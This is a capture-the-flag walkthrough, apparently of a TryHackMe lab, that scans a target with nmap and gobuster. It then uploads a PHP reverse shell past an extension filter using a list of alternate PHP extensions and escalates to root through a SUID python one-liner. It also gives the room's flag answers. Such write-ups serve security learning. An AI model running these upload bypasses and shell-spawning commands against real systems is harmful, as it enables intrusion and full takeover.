Reconnaissance
Scan the machine, how many ports are open?
Let’s start with a nmap scan
1
nmap 10.10.138.249
and then a detailed one to see the port service and version
1
nmap -sCV -p22,80 10.10.138.249
1
2
3
4
5
6
7
8
9
10
11
12
13
14
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4ab9160884c25448ba5cfd3f225f2214 (RSA)
| 256 a9a686e8ec96c3f003cd16d54973d082 (ECDSA)
|_ 256 22f6b5a654d9787c26035a95f3f9dfcd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: HackIT - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
2
What version of Apache is running?
In the Nmap scan, we see that we already have the answer to this
Apache/2.4.29
What service is running on port 22?
ssh
Find directories on the web server using the GoBuster tool.
Let’s do a Gobuster scan the syntax is:
1
gobuster [mode] -u [target ip] -w [wordlist]
1
gobuster dir -u 10.10.138.249 -w /usr/share/dirb/wordlists/common.txt
1
2
3
4
5
6
/css (Status: 301) [Size: 312] [--> http://10.10.138.249/css/]
/index.php (Status: 200) [Size: 616]
/js (Status: 301) [Size: 311] [--> http://10.10.138.249/js/]
/panel (Status: 301) [Size: 314] [--> http://10.10.138.249/panel/]
/server-status (Status: 403) [Size: 278]
/uploads (Status: 301) [Size: 316] [--> http://10.10.138.249/uploads/]
What is the hidden directory?
We see two hidden directories, /panel and /uploads but the correct answer is
/panel
which is a site to upload a file
Getting a shell
So now that we have a file to upload a file, let’s start trying to upload a php reverse shell that i suppose we can execute later going to the /uploads directory
I am going to use this:
https://github.com/pentestmonkey/php-reverse-shell
Remember to change the IP and PORT of your machine that you will use. And set up the listener with the port in your machine
1
nc -lvnp 1234
but we get a prompt that says php files are not allowed
Let’s try to use another extension of php if this will bypass the extension filter
like these that I got from: https://book.hacktricks.xyz/pentesting-web/file-upload PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
and with the second extension, the file got uploaded!
now let’s head over to the uploads directory and try to run it
I wasn’t running so I tried with a more popular extension: .php5 and it worked, now we have a shell, let’s retrieve the user.txt flag
user.txt
to find the flag, since I know what the name is I will search for it with the command find
1
find / -name user.txt 2>/dev/null
the way it works is ‘find [directory to search] -name [name of the file] 2>/dev/null [this last part is to avoid printing errors]
we found it on /var/www/user.txt, lets use cat to read it
THM{y0u_g0t_a_sh3ll}
Privilege Escalation
Search for files with SUID permission, which file is weird?
to find this kind of file we can use the following command:
1
find / -type f -perm -04000 -ls 2>/dev/null
the one that stands out is this:
/usr/bin/python
Find a form to escalate your privileges.
let’s head over to gtfobin to search an exploit for this SUID FILE
we got this
1
./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
remember to change ./python to the actual directory path that we found
1
./usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
and with this, we got a root shell
root.txt
I head over /root and there it is, the root.txt flag
THM{pr1v1l3g3_3sc4l4t10n}